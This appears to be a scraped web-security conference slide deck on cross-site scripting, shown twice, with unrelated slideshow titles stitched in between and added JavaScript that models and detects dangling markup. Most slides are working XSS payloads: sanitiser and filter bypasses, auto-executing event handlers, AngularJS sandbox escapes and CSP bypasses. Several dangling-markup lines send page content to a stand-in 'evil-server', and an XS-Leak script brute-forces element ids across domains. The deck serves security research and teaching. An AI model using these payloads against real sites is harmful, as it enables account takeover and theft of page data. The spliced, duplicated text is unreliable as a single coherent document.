XSS magic tricks
Advancements in XSS
By Gareth Heyes
@garethheyes
• I ❤ hacking JavaScript
• I'm a researcher at PortSwigger
• Follow me on Twitter @garethheyes
About me
<a href=# name=x id=x>Click me on IE11</a>
<script event="onclick(blah)<wtfbbq>{}" for=x>
blah.view.alert(1)
</script>
<script event=onload for=window>
return alert(2)};{
</script>
Hacking filters
• Consuming tags
• title, noscript, style, script, noembed, textarea, plaintext, template, iframe, noframes
<noframes>
<img alt=" ">
</noframes>
<img alt=" ">
</noframes>
</noframes><script>alert(1)</script>
Hacking filters
• Template tag breaks out of select element
<template><select><option></template><img src=1 onerror=alert(1)></select></template>
Hacking filters
• Title exists in SVG and HTML
• Title consumes markup in HTML but not in SVG
• HTML in SVG?
Hacking filters
<svg>
<image>
<title>
<img title="</title><script>alert(1)</script>">
</title>
</svg>
🚫
Hacking filters
<svg>
<img>
<title>
<img title="</title><script>alert(1)</script>">
</title>
</svg>
✅
• Edge bug causes title to mutate
• E.g. in: <title>&lt;img&gt;
out: <title><img>
• I used this bug to bypass DOMPurify
• in: <x/><title>&lt;/title&gt;&lt;img src=1 onerror=alert(1)&gt;
out: <title></title><img src="1">
• What about double HTML encoded?
• in: <x/><title>&amp;lt;/title&amp;gt;&amp;lt;img src=1 onerror=alert(1)&amp;gt;
out: <title></title><img src=1 onerror=alert(1)></title>
Hacking filters
• Invalid attributes
<img ="/src/onerror=alert(1)//">
• HTML closing comments Firefox (version <=67), newline between --! and >
<!-- --!
><img src=1 onerror=alert(1)> -->
• HTML opening comments Firefox (version 68.0.1), [x00] denotes a NULL byte
<!-[x00][x00][x00][x00][x00]- ><div title="--><img src=1 onerror=alert(1)>"></div>
Hacking filters
• Firefox allows NULLs in entities, [0x00] denotes a NULL byte
• <a href="javascript&[0x00]#x6a;avascript:alert(1)">test</a>
• <a href="javascript&[0x00]colon[0x00];alert(1)">test</a>
Hacking filters
• Safari base tag
• <base href="javascript:/a/-alert(1)///////">
• Turns every relative URL into XSS
• <a href=../lol/safari.html>test</a>
• <a href>haha</a>
Hacking filters
XSS without parentheses and semi-colons
• Everyone knows about alert`1`
• I found you could do: onerror=alert;throw 1
• throw accepts a JavaScript expression
XSS without parentheses and semi-colons
• JavaScript expressions
x = (1,2);
x // 2
• The right-hand side of a comma expression is returned
XSS without parentheses and semi-colons
throw onerror=alert,'some string',123,'haha'
• The first part of the expression is executed and sets the error handler
• The last part of the expression is sent to the exception handler
XSS without parentheses and semi-colons
• How can you eval a string?
• The message passed to the handler is prefixed with "Uncaught"
• Change it to an assignment
throw onerror=eval,"=alert\x281\x29"
//Uncaught = alert(1)
XSS without parentheses and semi-colons
{onerror=eval}
throw{lineNumber:1,columnNumber:1,fileName:1,message:'alert\x281\x29'}
• Firefox prefixes the exception message with:
uncaught exception: 1
• How can we get round this?
XSS without parentheses and semi-colons
Hidden inputs
• XSS in hidden input
• Unexploitable when <> is filtered?
<input type="hidden" value="XSS HERE">
• Access keys to the rescue!
• "The accesskey global attribute provides a hint for generating a
keyboard shortcut for the current element." mdn
Hidden inputs
• Firefox allows onclick event + access keys
• <input type="hidden" accesskey="x" onclick="alert(1)">
(ALT+SHIFT+X on Windows) (CTRL+ALT+X on OS X)
• Firefox only but the technique can be used on Chrome
Hidden inputs
Link elements
• Access keys can be used on Chrome
• Hidden inputs don't work
• Other elements (link, meta etc.) do
<link rel="canonical" accesskey="X" onclick="alert(1)" />
(ALT+SHIFT+X on Windows) (CTRL+ALT+X on OS X)
Link elements
Dangling markup
• Uses incomplete markup to extract parts of the page
• <img src='//evil-server?
• HTML parser finds an incomplete src attribute
• Looks for ' to close the attribute
Dangling markup
• Example dangling markup attacks
• <table><tfoot background="//evil-server?
• <link rel=icon href="//evil-server?
• <video><source src="//evil?
Dangling markup
• Chrome protects against dangling markup attacks
• "Resource requests whose URLs contained both removed whitespace (`\n`, `\r`, `\t`) characters and less-than characters (`<`) are blocked." https://www.chromestatus.com/feature/5735596811091968
• CSP will also block external requests if specified in the policy
Dangling markup
• Bypassing restrictive CSP & Chrome mitigations
• CSP: default-src 'none'; base-uri 'none';
• <base target="
• Sets target for every link
• The markup will get passed in the window name
Dangling markup
• <a href=//evil-server><font size=100 color=red>You must click me</font></a><base target="
• Anchor points to evil server
• HTML styling is used to get round no inline styles
• Target consumes all markup until the " is found
• Clicking the link loads the attacker's server, which reads window.name containing the consumed markup
Dangling markup
• Mitigation <base target="_self" />
• Prevents target being overwritten
• Bypass requires 2 clicks
• <input name=x type=hidden form=x value="&lt;a href=//evil-server&gt;&lt;font size=100 color=red&gt;Click me second&lt;/font&gt;&lt;/a&gt;"><button form=x><font size=100 color=red>Click me first</font></button><form id=x target="
Dangling markup
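A small model of the consumption described in these slides, added here as an example and not part of the original deck: it shows what an unterminated quoted attribute captures from a constructed page, applies the whitespace + `<` rule quoted from Chrome to the `<img src='` variant, and checks that a preceding `<base target="_self">` wins over an injected `<base target="`. The victim page, token and evil-server name are all constructed.

```javascript
// Added example (not from the original slides): a small model of what the HTML
// tokenizer does with an unterminated quoted attribute value (dangling markup),
// the whitespace + '<' rule quoted from Chrome's mitigation, and the
// <base target="_self"> defence. Page, token and server name are constructed.

// Constructed victim page: the injection point sits before a hidden token and
// no quote characters appear until the final link.
const TOKEN = 't0k3n-constructed';
const VICTIM_PAGE = [
  '<p>Hello, INJECT</p>',
  '<input type=hidden name=csrf value=' + TOKEN + '>',
  '<a href="/logout">Log out</a>',
].join('\n');

// After the opening quote of an attribute value, the tokenizer treats every
// character up to the next matching quote (or end of input) as the value.
function danglingAttributeValue(html, injection, quote) {
  const start = html.indexOf(injection);
  if (start === -1) return null;
  const valueStart = start + injection.length;
  const end = html.indexOf(quote, valueStart);
  return end === -1 ? html.slice(valueStart) : html.slice(valueStart, end);
}

// Chrome's rule as quoted on the slide: a resource request is blocked when its
// URL contains both a removed whitespace character (\n, \r, \t) and '<'.
function blockedByChromeDanglingRule(url) {
  return /[\n\r\t]/.test(url) && url.includes('<');
}

// <img src='//evil-server? : the captured markup becomes part of a resource
// URL, so Chrome's rule sees it.
function simulateImgVector(page) {
  const injection = "<img src='//evil-server?";
  const html = page.replace('INJECT', injection);
  const captured = danglingAttributeValue(html, injection, "'");
  return {
    captured,
    tokenCaptured: captured.includes(TOKEN),
    requestBlocked: blockedByChromeDanglingRule('//evil-server?' + captured),
  };
}

// The first <base> element carrying a target wins; returns its value, with the
// same unterminated-quote behaviour as above.
function effectiveBaseTarget(html) {
  const m = /<base[^>]*target=(["'])/i.exec(html);
  if (!m) return null;
  const valueStart = m.index + m[0].length;
  const end = html.indexOf(m[1], valueStart);
  return end === -1 ? html.slice(valueStart) : html.slice(valueStart, end);
}

// <base target=" : the captured markup travels in window.name when a link is
// clicked. That is not a resource request, so the URL rule never applies; the
// slide's mitigation is a <base target="_self"> placed before any injection.
function simulateBaseVector(page, hardened) {
  let html = page.replace('INJECT', '<base target="');
  if (hardened) html = '<base target="_self">\n' + html;
  const target = effectiveBaseTarget(html);
  return {
    target,
    tokenLeaksViaWindowName: target.includes(TOKEN),
    requestBlocked: false, // window.name is not a URL, nothing for Chrome to block
  };
}

console.log(simulateImgVector(VICTIM_PAGE));
console.log(simulateBaseVector(VICTIM_PAGE, false));
console.log(simulateBaseVector(VICTIM_PAGE, true));
```

The `<base target="` result stops at the first `"` on the page, which is why the slide's payload pairs it with a real click rather than a resource load.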
Auto executing vectors
• Firefox onloadstart
<img src=1 onloadstart=alert(1)>
• Firefox onloadend
<img src=1 onloadend=alert(1)>
• <video><track default onload=alert(1) src="data:text/vtt,WEBVTT"></video>
Auto executing vectors
• Chrome
<svg><discard onbegin=alert(1)>
• Safari
<svg><anything onload=alert(1)>
• General svg
<svg><animate onbegin=alert(1) attributename=x dur=1s>
<svg><set onend=alert(1) attributename=x dur=1s>
<svg><animatetransform onrepeat=alert(1) attributename=x dur=1s repeatcount=2>
Auto executing vectors
• <body onpageshow=alert(1)>
• <body onpopstate=alert(1)>
<iframe src=//x-domain.com onload="if(!window.flag){this.contentWindow.location='//x-domain.com/#';flag=1}">
• <body onhashchange="alert(1)">
<iframe src=//x-domain.com onload="if(!window.flag){this.contentWindow.location='//x-domain.com#';window.flag=1;}">
• <body onmessage=alert(1)>
<script>postMessage('test','*')</script>
Auto executing vectors
• <body onbeforeunload="location='javascript:alert(1)'">
<iframe src=//x-domain.com onload="if(!window.flag){this.contentWindow.location='//x-domain.com#';flag=1}">
• <body onresize="alert(1)">
<iframe src=//x-domain.com onload="this.style.width='1000px'">
• <body onscroll=alert(1)><div style=height:1000px></div><div id=x></div>
Auto executing vectors
• <style>@keyframes x{}</style>
<b style="animation-name:x" onanimationstart="alert(1)"></b>
<b style="-webkit-animation-name:x" onanimationstart="alert(1)"></b>
• Discovered by the legend Mario Heiderich
• Executes on every tag but requires an injected style
Auto executing vectors
• ontransitionend works on Chrome
• <style>:target {color:red;}</style>
<x id=x style="transition:color 1s" ontransitionend=alert(1)>
• URL: page.html#x
Auto executing vectors
• ontransitionrun works on Firefox
• <style>:target {color:red;}</style>
<x id=y style="transition:color 2s" ontransitionrun=alert(1)>
• URL: page.html
• URL: page.html#x
Auto executing vectors
• Firefox ontransitioncancel
• <style>:target {color: red;}</style>
<x id=x style="transition:color 10s" ontransitioncancel=alert(1)>
• URL: page.html#
• URL: page.html#x
• URL: page.html#
Auto executing vectors
• Remember the classic vector?
<input autofocus onfocus=alert(1)>
• Autofocus required?
• Nope 😀 <input onfocus=alert(1) id=x>
• URL: page.html#x
Auto executing vectors
• onblur becomes auto executable (every browser except Firefox)
• <input onblur=alert(1) id=x><input autofocus>
<textarea onblur=alert(1) id=x></textarea><input autofocus>
<button onblur=alert(1) id=x></button><input autofocus>
<select onblur=alert(1) id=x></select><input autofocus>
• URL: page.html#x
• Focus events fire for iframes too
• <body onblur=alert(1)><iframe id=x></iframe>
<iframe id=x onblur=alert(1)></iframe><input autofocus>
Auto executing vectors
• <embed id=x onfocus=alert(1) type=text/html>
• <object id=x onfocus=alert(1) type=text/html>
• <video id=x controls onfocus=alert(1)>
<source src="validvideo.mp4" type=video/mp4>
</video>
• <audio id=x controls onfocus=alert(1)>
<source src="validaudio.wav">
</audio>
Auto executing vectors
AngularJS
• Standard AngularJS sandbox escape:
{{constructor.constructor('alert(1)')()}}
• Can we make it shorter?
• {{$eval.constructor('alert(1)')()}}
• Shorter still?
{{$on.constructor('alert(1)')()}}
//Credits Lewis Ardern
AngularJS
• What if you can't call $eval? e.g. in an orderBy filter
• Can't use strings
• {{toString().constructor.prototype.charAt=[].join;[1,2]|orderBy:toString().constructor.fromCharCode(120,61,97,108,101,114,116,40,49,41)}}
AngularJS
• CSP bypass for all versions of AngularJS
• 63 characters!
• <input id=x ng-focus=$event.path|orderBy:'CSS&&[1].map(alert)'>
• page.html#x
• Cross browser:
<input id=x ng-focus=$event.composedPath()|orderBy:'CSS&&[1].map(alert)'>
AngularJS
XS-Leak
• Focus event fires for iframe, input etc
• Can we detect if this happens cross domain?
• If it can be detected then ids can be bruteforced x-domain
XS-Leak
• The onblur event will be fired when a cross domain element is focused
• The hash can be checked multiple times with only 1 HTTP request (changing the fragment does not reload the frame)
• Requires a frame-able page
XS-Leak
Cross domain page (x-domain.com), containing the input element being searched for:
<input id=1337>
Same origin page: onblur fires when focus moves into the frame, the div shows the current position:
<body onblur="if(!window.found){window.found=true;alert('Found: '+pos)}">
<div id=y></div>
<script>
var pos = 1000, found = false, timer;
var iframe = document.createElement('iframe');
iframe.src = '//x-domain.com';
document.body.appendChild(iframe);
iframe.onload = next;
function next() {
  if (!found) {
    document.getElementById('y').textContent = pos;
    // changing only the fragment focuses the matching id without reloading the frame
    iframe.src = '//x-domain.com#' + pos;
    timer = setTimeout(function () {
      if (!found && pos < 2000) {
        pos++;
        next();
      }
    }, 50);
  }
}
</script>
//http://portswigger-labs.net/x-domain_leak_focus_095FD68DF/
XS-Leak
Auto execute on every tag?
• "The tabindex global attribute indicates if its element can be
focused, and if/where it participates in sequential keyboard
navigation" mdn
• <a onfocus=alert(1) id=x tabindex=1>
• <div onfocus=alert(1) id=x tabindex=1>
• <xss onfocus=alert(1) id=x tabindex=1>
• page.html#x
Auto execute on every tag?
• Works on pretty much every tag
• Link works but requires display:block
• <link onfocus=alert(1) id=x tabindex=1 style=display:block>
• Link works in the body but not in the head
Auto execute on every tag?
• <a onfocusin=alert(1) id=x tabindex=1>
• <div onfocusin=alert(1) id=x tabindex=1>
• <xss onfocusin=alert(1) id=x tabindex=1>
• <xss onfocusout=alert(1) id=x tabindex=1><input autofocus>
• page.html#x
Auto execute on every tag?
• IE activate/beforeactivate event
• <a onactivate=alert(1) id=x tabindex=1>
• <div onactivate=alert(1) id=x tabindex=1>
• <xss onactivate=alert(1) id=x tabindex=1>
• <xss onbeforeactivate=alert(1) id=x tabindex=1>
• page.html#x
Auto execute on every tag?
• IE deactivate/beforedeactivate event
• <a ondeactivate=alert(1) id=x tabindex=1></a><input id=y autofocus>
• <xss ondeactivate=alert(1) id=x tabindex=1></xss><input id=y autofocus>
• <xss onbeforedeactivate=alert(1) id=x tabindex=1></xss><input id=y autofocus>
• page.html#x
• page.html#y
Auto execute on every tag?
Questions?
thanks and shout outs to
@garethheyes
James Kettle, Mario Heiderich, Eduardo Vela, Masato Kinugawa, Filedescriptor, LeverOne, Ben
Hayak, Alex Inführ, Mathias Karlsson, Jan Horn, Ian Hickey, Gábor Molnár, tsetnep, Psych0tr1a,
Skyphire, Abdulrhman Alqabandi, brainpillow, Kyo, Yosuke Hasegawa, White Jordan, Algol,
jackmasa, wpulog, Bolk, Robert Hansen, David Lindsay, Superhei, Michal Zalewski, Renaud
Lifchitz, Roman Ivanov, Frederik Braun, Krzysztof Kotowicz, Giorgio Maone, GreyMagic, Marcus
Niemietz, Soroush Dalili, Stefano Di Paola, Roman Shafigullin, Lewis Ardern, Michał Bentkowski
<img src=1 onerror="alert('Wait. What. IE/Edge')};while(true)sendMeToTheJSBlackHole();function lol(){">

Main news related to the CCS TSI 2023 (2023/1695)Main news related to the CCS TSI 2023 (2023/1695)
Main news related to the CCS TSI 2023 (2023/1695)
 
Connector Corner: Seamlessly power UiPath Apps, GenAI with prebuilt connectors
Connector Corner: Seamlessly power UiPath Apps, GenAI with prebuilt connectorsConnector Corner: Seamlessly power UiPath Apps, GenAI with prebuilt connectors
Connector Corner: Seamlessly power UiPath Apps, GenAI with prebuilt connectors
 
"What does it really mean for your system to be available, or how to define w...
"What does it really mean for your system to be available, or how to define w..."What does it really mean for your system to be available, or how to define w...
"What does it really mean for your system to be available, or how to define w...
 
What is an RPA CoE? Session 1 – CoE Vision
What is an RPA CoE?  Session 1 – CoE VisionWhat is an RPA CoE?  Session 1 – CoE Vision
What is an RPA CoE? Session 1 – CoE Vision
 
Session 1 - Intro to Robotic Process Automation.pdf
Session 1 - Intro to Robotic Process Automation.pdfSession 1 - Intro to Robotic Process Automation.pdf
Session 1 - Intro to Robotic Process Automation.pdf
 
Day 2 - Intro to UiPath Studio Fundamentals
Day 2 - Intro to UiPath Studio FundamentalsDay 2 - Intro to UiPath Studio Fundamentals
Day 2 - Intro to UiPath Studio Fundamentals
 
PRODUCT LISTING OPTIMIZATION PRESENTATION.pptx
PRODUCT LISTING OPTIMIZATION PRESENTATION.pptxPRODUCT LISTING OPTIMIZATION PRESENTATION.pptx
PRODUCT LISTING OPTIMIZATION PRESENTATION.pptx
 
High performance Serverless Java on AWS- GoTo Amsterdam 2024
High performance Serverless Java on AWS- GoTo Amsterdam 2024High performance Serverless Java on AWS- GoTo Amsterdam 2024
High performance Serverless Java on AWS- GoTo Amsterdam 2024
 
Northern Engraving | Modern Metal Trim, Nameplates and Appliance Panels
Northern Engraving | Modern Metal Trim, Nameplates and Appliance PanelsNorthern Engraving | Modern Metal Trim, Nameplates and Appliance Panels
Northern Engraving | Modern Metal Trim, Nameplates and Appliance Panels
 
Freshworks Rethinks NoSQL for Rapid Scaling & Cost-Efficiency
Freshworks Rethinks NoSQL for Rapid Scaling & Cost-EfficiencyFreshworks Rethinks NoSQL for Rapid Scaling & Cost-Efficiency
Freshworks Rethinks NoSQL for Rapid Scaling & Cost-Efficiency
 
QA or the Highway - Component Testing: Bridging the gap between frontend appl...
QA or the Highway - Component Testing: Bridging the gap between frontend appl...QA or the Highway - Component Testing: Bridging the gap between frontend appl...
QA or the Highway - Component Testing: Bridging the gap between frontend appl...
 
How to Interpret Trends in the Kalyan Rajdhani Mix Chart.pdf
How to Interpret Trends in the Kalyan Rajdhani Mix Chart.pdfHow to Interpret Trends in the Kalyan Rajdhani Mix Chart.pdf
How to Interpret Trends in the Kalyan Rajdhani Mix Chart.pdf
 
Poznań ACE event - 19.06.2024 Team 24 Wrapup slidedeck
Poznań ACE event - 19.06.2024 Team 24 Wrapup slidedeckPoznań ACE event - 19.06.2024 Team 24 Wrapup slidedeck
Poznań ACE event - 19.06.2024 Team 24 Wrapup slidedeck
 
LF Energy Webinar: Carbon Data Specifications: Mechanisms to Improve Data Acc...
LF Energy Webinar: Carbon Data Specifications: Mechanisms to Improve Data Acc...LF Energy Webinar: Carbon Data Specifications: Mechanisms to Improve Data Acc...
LF Energy Webinar: Carbon Data Specifications: Mechanisms to Improve Data Acc...
 

XSS Magic tricks

1. XSS magic tricks
Advancements in XSS
By Gareth Heyes
@garethheyes

2. About me
• I ❤ hacking JavaScript
• I'm a researcher at PortSwigger
• Follow me on Twitter @garethheyes

3.
<a href=# name=x id=x>Click me on IE11</a>
<script event="onclick(blah)<wtfbbq>{}" for=x>
blah.view.alert(1)
</script>
<script event=onload for=window>
return alert(2)};{
</script>

4. Hacking filters
• Consuming tags
• title, noscript, style, script, noembed, textarea, plaintext, template, iframe, noframes
<noframes>
<img alt=" ">
</noframes>
<img alt=" ">
</noframes>
</noframes><script>alert(1)</script>
• Template tag breaks out of select element
<template><select><option></template><img src=1 onerror=alert(1)></select></template>

5. Hacking filters
• Title exists in SVG and HTML
• Title consumes markup in HTML but not in SVG
• HTML in SVG?

8. Hacking filters
• Edge bug causes title to mutate
• E.g.
in: <title>&lt;img&gt;
out: <title><img>
• I used this bug to bypass DOMPurify
• in: <x/><title>&lt;/title&gt;&lt;img src=1 onerror=alert(1)&gt;
out: <title></title><img src="1">
• What about double HTML encoded?
• in: <x/><title>&amp;lt;/title&amp;gt;&amp;lt;img src=1 onerror=alert(1)&amp;gt;
out: <title></title><img src=1 onerror=alert(1)></title>

9. Hacking filters
• Invalid attributes
<img ="/src/onerror=alert(1)//">
• HTML closing comments Firefox (version <=67)
<!-- --!
><img src=1 onerror=alert(1)> -->
• HTML opening comments Firefox (version 68.0.1)
<!-[\x00][\x00][\x00][\x00][\x00]- ><div title="--><img src=1 onerror=alert(1)>"></div>

10. Hacking filters
• Firefox allows NULLs in entities
• <a href="javascript&[0x00]#x6a;avascript:alert(1)">test</a>
• <a href="javascript&[0x00]colon[0x00];alert(1)">test</a>

11. Hacking filters
• Safari base tag
• <base href="javascript:/a/-alert(1)///////">
• Turns every relative URL into XSS
• <a href=../lol/safari.html>test</a>
• <a href>haha</a>

13. XSS without parentheses and semicolons
• Everyone knows about alert`1`
• I found you could do: onerror=alert;throw 1
• throw accepts a JavaScript expression

14. XSS without parentheses and semicolons
• JavaScript expressions
x = (1,2);
x//2
• Right hand side of the comma expression is returned

15. XSS without parentheses and semicolons
throw onerror=alert,'some string', 123,'haha'
• First part of the expression is executed and sets the error handler
• Last part of the expression is sent to the exception handler

16. XSS without parentheses and semicolons
• How can you eval a string?
• The exception message is prefixed with "Uncaught"
• Change it to an assignment
throw onerror=eval,"=alert\x281\x29"
//Uncaught = alert(1)

17. XSS without parentheses and semicolons
{onerror=eval}
throw{lineNumber:1, columnNumber:1,
fileName:1,
message:'alert\x281\x29'}
• Firefox prefixes the exception message with:
uncaught exception: 1
• How can we get round this?

19. Hidden inputs
• XSS in hidden input
• Unexploitable when <> is filtered?
<input type="hidden" value="XSS HERE">
• Access keys to the rescue!
• "The accesskey global attribute provides a hint for generating a keyboard shortcut for the current element." mdn

20. Hidden inputs
• Firefox allows onclick event + access keys
• <input type="hidden" accesskey="x" onclick="alert(1)">
(ALT+SHIFT+X on Windows) (CTRL+ALT+X on OS X)
• Firefox only, but the technique can be used on Chrome

22. Link elements
• Access keys can be used on Chrome
• Hidden inputs don't work
• Other elements (link, meta etc.) do
<link rel="canonical" accesskey="X" onclick="alert(1)" />
(ALT+SHIFT+X on Windows) (CTRL+ALT+X on OS X)

24. Dangling markup
• Uses incomplete markup to extract parts of the page
• <img src='//evil-server?
• HTML parser finds an incomplete src attribute
• Looks for ' to close the attribute

25. Dangling markup
• Example dangling markup attacks
• <table><tfoot background="//evil-server?
• <link rel=icon href="//evil-server?
• <video><source src="//evil?

26. Dangling markup
• Chrome protects against dangling markup attacks
• "Resource requests whose URLs contained both removed whitespace (`\n`, `\r`, `\t`) characters and less-than characters (`<`) are blocked." https://www.chromestatus.com/feature/5735596811091968
• CSP will also block external requests if specified in the policy

27. Dangling markup
• Bypassing restrictive CSP & Chrome mitigations
• CSP: default-src 'none'; base-uri 'none';
• <base target="
• Sets target for every link
• The markup will get passed in the window name

28. Dangling markup
• <a href=//evil-server><font size=100 color=red>You must click me</font></a><base target="
• Anchor points to evil server
• HTML styling is used to get round no inline styles
• Target consumes all markup until the " is found
• Clicking the link loads the attacker's server, which reads window.name containing the consumed markup

29. Dangling markup
• Mitigation <base target="_self" />
• Prevents target being overwritten
• Bypass requires 2 clicks
• <input name=x type=hidden form=x value="&lt;a href=//evil-server&gt;&lt;font size=100 color=red&gt;Click me second&lt;/font&gt;&lt;/a&gt;"><button form=x><font size=100 color=red>Click me first</font></button><form id=x target="

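As an added, defender-side example that is not part of the talk: the first function reproduces the Chrome heuristic quoted on slide 26, and the second scans a rendered HTML fragment for a quoted attribute value that is never closed, which is what the dangling `<img src='//evil-server?` from slide 24 leaves behind in a response. The sample page, the `evil-server` host and the token value are constructed.

```javascript
// Chrome rule (slide 26): a resource URL that still carries raw \n, \r or \t
// (characters the URL parser strips) together with a '<' is blocked. That is
// exactly what an unterminated src='//evil-server? produces once it swallows
// the rest of the page, so the same test works as a log/proxy-side detector.
function isBlockedByChromeRule(url) {
  return /[\n\r\t]/.test(url) && url.includes('<');
}

// Returns {tag, attr, value} for the first unterminated quoted attribute value,
// or null when every attribute value in the fragment is properly closed.
function findDanglingAttribute(html) {
  let i = 0;
  while (i < html.length) {
    const lt = html.indexOf('<', i);
    if (lt === -1) return null;
    const name = /^<([a-zA-Z][\w-]*)/.exec(html.slice(lt));
    if (!name) { i = lt + 1; continue; }         // comment, end tag or stray '<'
    const tag = name[1].toLowerCase();
    let j = lt + name[0].length;
    while (j < html.length && html[j] !== '>') { // scan this tag's attributes
      const attr = /^\s*([^\s=>\/]+)\s*=\s*(["'])/.exec(html.slice(j));
      if (!attr) { j++; continue; }              // boolean or unquoted attribute
      const valueStart = j + attr[0].length;
      const close = html.indexOf(attr[2], valueStart);
      if (close === -1) {                        // quote never closed: dangling
        return { tag, attr: attr[1].toLowerCase(), value: html.slice(valueStart) };
      }
      j = close + 1;                             // skip the whole quoted value
    }
    i = j + 1;
  }
  return null;
}

// Constructed sample, not a real page: an injected <img src='//evil-server? was
// never closed, so the markup that follows it (token included) becomes the URL.
const SAMPLE_LEAKED_PAGE =
  '<h1>Profile</h1>\n' +
  "<img src='//evil-server?\n" +
  '<form action="/update">\n' +
  '<input type="hidden" name="csrf" value="constructed-token-123">\n' +
  '</form>';

// Audits a rendered fragment: reports the dangling attribute (if any) and
// whether Chrome's rule would have blocked the resulting resource request.
function auditFragment(html) {
  const dangling = findDanglingAttribute(html);
  return {
    dangling,
    chromeWouldBlock: dangling !== null && isBlockedByChromeRule(dangling.value),
  };
}

console.log(auditFragment(SAMPLE_LEAKED_PAGE));
```

Note that a percent-encoded newline (`%0A`) does not satisfy the rule as quoted, so the check is a heuristic and CSP remains the primary control.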
31. Auto executing vectors
• Firefox onloadstart
<img src=1 onloadstart=alert(1)>
• Firefox onloadend
<img src=1 onloadend=alert(1)>
• <video><track default onload=alert(1) src="data:text/vtt,WEBVTT"></video>

32. Auto executing vectors
• Chrome
<svg><discard onbegin=alert(1)>
• Safari
<svg><anything onload=alert(1)>
• General svg
<svg><animate onbegin=alert(1) attributename=x dur=1s>
<svg><set onend=alert(1) attributename=x dur=1s>
<svg><animatetransform onrepeat=alert(1) attributename=x dur=1s repeatcount=2>

33. Auto executing vectors
• <body onpageshow=alert(1)>
• <body onpopstate=alert(1)>
<iframe src=//x-domain.com onload="if(!window.flag) {this.contentWindow.location='//x-domain.com/#';flag=1}">
• <body onhashchange="alert(1)">
<iframe src=//x-domain.com onload="if(!window.flag) {this.contentWindow.location='//x-domain.com#';window.flag=1;}">
• <body onmessage=alert(1)>
<script>
postMessage('test','*')
</script>

34. Auto executing vectors
• <body onbeforeunload="location='javascript:alert(1)'">
<iframe src=//x-domain.com onload="if(!window.flag) {this.contentWindow.location='//x-domain.com#';flag=1}">
• <body onresize="alert(1)">
<iframe src=//x-domain.com onload="this.style.width='1000px'">
• <body onscroll=alert(1)><div style=height:1000px></div><div id=x></div>

35. Auto executing vectors
• <style>
@keyframes x{
}
</style>
<b style="animation-name:x" onanimationstart="alert(1)"></b>
<b style="-webkit-animation-name:x" onanimationstart="alert(1)"></b>
• Discovered by the legend Mario Heiderich
• Executes on every tag but requires an injected style

36. Auto executing vectors
• ontransitionend works on Chrome
• <style>
:target {
color:red;
}
</style>
<x id=x style="transition:color 1s" ontransitionend=alert(1)>
• URL: page.html#x

37. Auto executing vectors
• ontransitionrun works on Firefox
• <style>
:target {
color:red;
}
</style>
<x id=y style="transition:color 2s" ontransitionrun=alert(1)>
• URL: page.html
• URL: page.html#x

38. Auto executing vectors
• Firefox ontransitioncancel
• <style>
:target {
color: red;
}
</style>
<x id=x style="transition:color 10s" ontransitioncancel=alert(1)>
• URL: page.html#
• URL: page.html#x
• URL: page.html#

39. Auto executing vectors
• Remember the classic vector?
<input autofocus onfocus=alert(1)>
• Autofocus required?
• Nope 😀
<input onfocus=alert(1) id=x>
• URL: page.html#x

40. Auto executing vectors
• onblur becomes auto executable (every browser except Firefox)
• <input onblur=alert(1) id=x><input autofocus>
<textarea onblur=alert(1) id=x></textarea><input autofocus>
<button onblur=alert(1) id=x></button><input autofocus>
<select onblur=alert(1) id=x></select><input autofocus>
• URL: page.html#x
• Focus events fire for iframes too
• <body onblur=alert(1)><iframe id=x></iframe>
<iframe id=x onblur=alert(1)></iframe><input autofocus>

41. Auto executing vectors
• <embed id=x onfocus=alert(1) type=text/html>
• <object id=x onfocus=alert(1) type=text/html>
• <video id=x controls onfocus=alert(1)>
<source src="validvideo.mp4" type=video/mp4>
</video>
• <audio id=x controls onfocus=alert(1)>
<source src="validaudio.wav">
</audio>

43. AngularJS
• Standard AngularJS sandbox escape:
{{constructor.constructor('alert(1)')()}}
• Can we make it shorter?
• {{$eval.constructor('alert(1)')()}}
• Shorter still?
{{$on.constructor('alert(1)')()}}
//Credits Lewis Ardern

44. AngularJS
• What if you can't call $eval? e.g. in an orderBy filter
• Can't use strings
• {{toString().constructor.prototype.charAt=[].join;[1,2]|orderBy:toString().constructor.fromCharCode(120,61,97,108,101,114,116,40,49,41)}}

45. AngularJS
• CSP bypass for all versions of AngularJS
• 63 characters!
• <input id=x ng-focus=$event.path|orderBy:'CSS&&[1].map(alert)'>
• page.html#x
• Cross browser:
<input id=x ng-focus=$event.composedPath()|orderBy:'CSS&&[1].map(alert)'>

47. XS-Leak
• Focus event fires for iframe, input etc.
• Can we detect if this happens cross domain?
• If it can be detected then ids can be bruteforced cross-domain

48. XS-Leak
• onblur event will be fired when a cross domain element is focused
• Hash can be checked multiple times with only 1 HTTP request
• Requires a frame-able page

49. XS-Leak
Cross domain input element:
<input id=1337>
Same origin onblur event:
<body onblur="if(!window.found){window.found=true;alert('Found: '+pos)}">
Same origin, shows current position:
<div id=y></div>

50. XS-Leak
pos = 1000; found = false;
var iframe = document.createElement('iframe');
iframe.src = '//x-domain.com';
document.body.appendChild(iframe);
iframe.onload = next;
function next() {
  if (!found) {
    // show the id currently being tested (the <div id=y> from slide 49)
    document.getElementById('y').textContent = pos;
    // navigate the frame to #pos; if an element with that id exists it takes
    // focus and the same-origin body's onblur handler (slide 49) fires
    iframe.src = '//x-domain.com#' + pos;
    timer = setTimeout(function () {
      if (!found && pos < 2000) {
        pos++;
      }
      next();
    }, 50);
  }
}
//http://portswigger-labs.net/x-domain_leak_focus_095FD68DF/

51. Auto execute on every tag?

52. Auto execute on every tag?
• "The tabindex global attribute indicates if its element can be focused, and if/where it participates in sequential keyboard navigation" mdn
• <a onfocus=alert(1) id=x tabindex=1>
• <div onfocus=alert(1) id=x tabindex=1>
• <xss onfocus=alert(1) id=x tabindex=1>
• page.html#x

53. Auto execute on every tag?
• Works on pretty much every tag
• Link works but requires display block
• <link onfocus=alert(1) id=x tabindex=1 style=display:block>
• Link works in the body but not in the head

54. Auto execute on every tag?
• <a onfocusin=alert(1) id=x tabindex=1>
• <div onfocusin=alert(1) id=x tabindex=1>
• <xss onfocusin=alert(1) id=x tabindex=1>
• <xss onfocusout=alert(1) id=x tabindex=1><input autofocus>
• page.html#x

55. Auto execute on every tag?
• IE activate/beforeactivate event
• <a onactivate=alert(1) id=x tabindex=1>
• <div onactivate=alert(1) id=x tabindex=1>
• <xss onactivate=alert(1) id=x tabindex=1>
• <xss onbeforeactivate=alert(1) id=x tabindex=1>
• page.html#x

56. Auto execute on every tag?
• IE deactivate/beforedeactivate event
• <a ondeactivate=alert(1) id=x tabindex=1></a><input id=y autofocus>
